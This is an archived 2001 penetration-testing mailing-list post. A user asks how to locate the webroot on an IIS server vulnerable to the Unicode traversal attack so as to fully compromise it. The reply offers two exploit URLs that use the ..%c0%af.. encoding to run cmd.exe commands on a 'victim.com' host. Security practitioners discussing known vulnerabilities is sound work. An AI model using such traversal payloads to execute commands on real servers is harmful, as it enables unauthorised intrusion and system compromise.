http://victim.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+cd and for further reading see: http://victim.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set > -----Original Message----- > From: * [mailto:toddat_private] > Sent: Thursday, June 14, 2001 07:30 > To: pen-testat_private > Subject: finding webroot on IIS > > > hello all, > > Recently i came across an IIS webserver that i found to be > vulnerable to the > Unicode attacks. However, i cannot determine the webroot of > this drive, and > therefore i am having troubles reaching a full comprimise. > The directory > "C:\Inetpub" exists, but the only contents of this directory > is the folder > "mailroot". > > Additionally, when i connect and request the root document > (ie GET / ), it > returns the string: "<% Response.ContentType = "text/plain" %> HELLO" > > Does anyone come across anything like this before, and what > would be the > simplest method of determining the webroot? > > thanks in advance > todd willey > ubermother >
This archive was generated by hypermail 2b30 : Thu Jun 14 2001 - 17:30:39 PDT